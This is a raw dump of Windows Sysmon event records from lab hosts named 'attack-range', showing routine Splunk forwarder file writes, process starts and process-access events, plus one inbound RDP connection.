Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBBB2B707C67E19A27F320DEE07F7AC6,SHA256=474CB61CE9C01308A46526F429CD290C6C7CF8AE13E1C2F12115E65435230B41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:58.400{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34BDEB5BFBC1FC81F6FAF0C204EA5316,SHA256=16A4D5E96690C99360597AAD2087E0C66E6D089D853CD132F469DF173E76C22F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:59.416{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB7901DEE715424D07F4BF0F47E3064,SHA256=66BFCC19F93A551677BBE3DE8B0E9031223D556B665A539DBAC0AF84BE3F91F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223353Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:59.667{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE9622B07588960D7404DA97E1D6495D,SHA256=640F1F01F0E203A735CC6EA61EF9E7EDA5ECF41419F8264380DCC7DA613C9D4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:57.646{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49619-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:00.453{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA22CFCCA333AF2FB1793DD195B775F,SHA256=D30533B6A36730E1A2F8D11665F2FBAD40DE94EE9DF605D40DF9A2B25F8B7F28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223354Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:00.667{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EE8CF88BE19998314DF240DCE2A5563,SHA256=B6BFF3DE1C5F5DF4C214E2A7ADB8BE634005358E0E1963DA3278BA4E3FFB3659,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223355Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:01.667{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D608D161492FF7799AD20E50E9A632D,SHA256=60ABB651CC66402188BF41B1F209A7868D476451F03B45140BDE780F2ACD87FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:01.568{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DD3071FF3DE46341BA8418A3661A412,SHA256=D90E31BB5B42309832473B2B5D246C322583F9DF95E2C0E8CE07D9BC3E924052,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:01.468{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A41-6216-7D07-000000003802}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:01.468{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:01.468{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:01.468{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:01.468{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:01.468{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1A41-6216-7D07-000000003802}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:01.468{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A41-6216-7D07-000000003802}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:01.469{C8EA50B7-1A41-6216-7D07-000000003802}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223358Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:02.714{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66C89262DC86335E3D4833FF47DEEAC0,SHA256=4B3B58C0CCFE62BF7922B6B342884E064EBDE72B8CAC5320E89D42E2B919D08F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:02.575{C8EA50B7-1A42-6216-7E07-000000003802}51366564C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:02.506{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54F3B1F356FA5E35AF463E6052BA8193,SHA256=9B07DCF8F0B04B299400DA12618231833475F488B1CDEA9469E7202AA830AECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223357Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:02.683{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=196E9C5196D7EB9D6501C2016A7505BF,SHA256=5E8E5DB84C09F5E9FBCAF161ABA2253052B8A288B9BD774CE74E661E628BABBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223356Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:02.683{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB2B875FE306E3ED04688D314EC7B91F,SHA256=F85B32B8B26AD7BEEFB90E672B5C40BFF90ADB31A79E2368FF778D7950F3FE35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:02.359{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A42-6216-7E07-000000003802}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:02.359{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:02.359{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:02.358{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:02.357{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:02.356{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1A42-6216-7E07-000000003802}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:02.355{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A42-6216-7E07-000000003802}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:02.354{C8EA50B7-1A42-6216-7E07-000000003802}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000223360Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:00.301{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse47.242.107.32-55568-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000223359Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:03.731{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F52FCB095C4E897C51AA6EFAF98877A,SHA256=7D4B86FA67EB9C717D6E447BC1317AE93B3835FD5F4273D6064E524745994F3D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.536{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A43-6216-7F07-000000003802}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.536{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.536{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL3